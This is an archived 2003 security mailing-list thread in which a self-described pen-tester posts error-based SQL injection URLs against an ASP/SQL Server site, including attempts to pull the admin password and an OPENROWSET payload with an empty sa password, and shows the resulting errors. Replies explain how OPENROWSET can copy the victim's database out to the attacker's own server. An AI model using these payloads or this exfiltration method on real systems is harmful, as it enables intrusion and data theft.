Re: SQL Injection ASP + SQL Server (problem) ?!

From: Cesar (cesarc56at_private)
Date: Fri Aug 01 2003 - 08:14:08 PDT

  • Next message: exceed: "Re: About windows 2000 + sam"

    I misunderstood? What you are talking about?
    I wrote the paper!!!.
    
    BTW: the process is very simple, you only have to get
    familiar with it and you will see how easy it's. Also
    you don't always need to install SQL Server on your
    system, you only need to have control (i mean to have
    some kind of access) on an SQL Server.
    
    
    Cesar.
    --- Stephen de Vries <stephen.devriesat_private>
    wrote:
    > 
    > Cesar,
    > 
    > I think you misunderstood the use of OPENROWSET
    > explained in the paper
    > below:
    >
    http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
    > 
    > The idea is to install MS-SQL server on YOUR OWN
    > SYSTEM, and then use the
    > openrowset command to pull data from the vulnerable
    > system to your system.
    > Of course, as the paper explains, you will have to
    > be able to make SQL
    > requests from the vulnerable system to yours over
    > some TCP port
    > (preferably 1433, as this saves you some extra
    > hassle).  As long as you
    > can inject the OPENROWSET command, and you can make
    > TCP connections out
    > from their database server, you can recreate their
    > entire database on your
    > local system.  The process is quite long and doesn't
    > allow for mistakes,
    > so I'd try it out in a lab environment first to get
    > familiar with it.
    > Good luck.
    > 
    > Stephen
    > 
    > 
    > 
    > 
    > On Wed, 30 Jul 2003 sekureat_private wrote:
    > 
    > > Hi Cesar,
    > >
    > > First Thkz for help and attention.
    > >
    > > > Take a look a this paper:
    > > >
    > >
    > > Your paper is very intersting.. with advanced
    > techniques.. :)
    > >
    > > But how i will use OPENROWSET if as i wrote in my
    > first mail i can't get the
    > > password for admin. :(
    > >
    > > ps.: See my last mail...
    > >
    > > Then i tryed use sa without password....
    > >
    > >
    >
    http://www.server.com/portal/index.asp?local=ler&id_noticia=(select%20*%20from%20OPENROWSET('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;address=127.0.0.1;','%20select%20*%20from%20usuarios'))%20--
    > >
    > > But it have a passowrd...
    > >
    > > Error Type:
    > > Microsoft OLE DB Provider for ODBC Drivers
    > (0x80004005)
    > > [Microsoft][ODBC SQL Server Driver][SQL
    > Server]Login failed for user 'sa'.
    > >
    > >
    > > Ideas ?
    > >
    > > A other doubt if the conecction timeout or the
    > server didn't respond...
    > > probrability the SQL Server is in other Server. Do
    > u know some tips to
    > > detect where is other SQL Server (IP) ??
    > >
    > > ps.: If i could read local files i could try find
    > user/pass in .asp files..
    > > ;)
    > >
    > > > also this tool, you only have to copy, paste and
    > click
    > > > and you get all the data you want:
    > > >
    >
    http://www.appsecinc.com/resources/freetools/DataThief.zip
    > >
    > > I treyd it.. I used this string in url
    > >
    >
    http://www.server.com/portal/index.asp?local=ler&id_noticia=1';
    > <***> with
    > > GET method. And i received always this message:
    > >
    > > Data Thief V1.0
    > > [DBMSSOCN] General network error. Check your
    > network connection.
    > >
    > > Can u help me ?? :)
    > >
    > > ps.: My first post is below.. :)
    > >
    > > Thkz and Regards
    > >
    > > [ ]'s
    > >
    > >
    > >
    > > >
    > > >
    > > >
    > > > Cesar.
    > > >
    > > > --- sekureat_private wrote:
    > > > > Hi,
    > > > >
    > > > > I'm doing a pen-test in a WebServer running
    > Win2K +
    > > > > IIS + ASP + SQL
    > > > > Server (filtred for internet connections).
    > > > >
    > > > > The IIS appear to be very well patched. I'm
    > trying
    > > > > SQL Injection. :)
    > > > >
    > > > > I found a bug in ASP Script... see:
    > > > >
    > > > >
    > > >
    > >
    >
    http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
    > > > >
    > > > > I received the name of the min(user) in users
    > > > > tables, see:
    > > > >
    > > > > Technical Information (for support personnel)
    > > > >
    > > > > Error Type:
    > > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > > (0x80040E07)
    > > > > [Microsoft][ODBC SQL Server Driver][SQL
    > > > > Server]Syntax error converting
    > > > > the nvarchar value 'admin' to a column of data
    > type
    > > > > int.
    > > > >
    > > > > The username is "admin". Now i want to know
    > the
    > > > > password of "admin" i
    > > > > tryed:
    > > > >
    > > > >
    > > >
    > >
    >
    http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
    > > > >
    > > > > But i received it:
    > > > >
    > > > > Error Type:
    > > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > > (0x80004005)
    > > > > [Microsoft][ODBC SQL Server Driver][SQL
    > > > > Server]Subquery returned more
    > > > > than 1 value. This is not permitted when the
    > > > > subquery follows =, !=,
    > > > > <, <= , >, >= or when the subquery is used as
    > an
    > > > > expression.
    > > > >
    > > > > 1 - Someone know how to do it return more than
    > 1
    > > > > value ?? can give-me
    > > > > a example ?
    > > > >
    > > > > I tryed it too:
    > > > >
    > > > >
    > > >
    > >
    >
    http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
    > > > >
    > > > > And i receive it:
    > > > >
    > > > > Error Type:
    > > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > > (0x80040E07)
    > > > > [Microsoft][ODBC SQL Server Driver][SQL
    > > > > Server]Syntax error converting
    > > > > the varchar value
    > > > >
    > > >
    > >
    >
    '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481
    > > -0512-0545-0576-0609-0640}'
    > > > > to a column of data type int.
    > > > >
    > > > > 2 - But it isn't a "password", it appear be a
    > > > > registry key. Someone
    > > > > know what is it ?? And how to do it work and
    > see the
    > > > > password ? :)
    > > > >
    > > > > 3 - I tryed to create a SQL Transaction like
    > this:
    > > > >
    > > > >
    > 
    === message truncated ===
    
    
    __________________________________
    Do you Yahoo!?
    Yahoo! SiteBuilder - Free, easy-to-use web site design software
    http://sitebuilder.yahoo.com
    
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Fri Aug 01 2003 - 10:34:07 PDT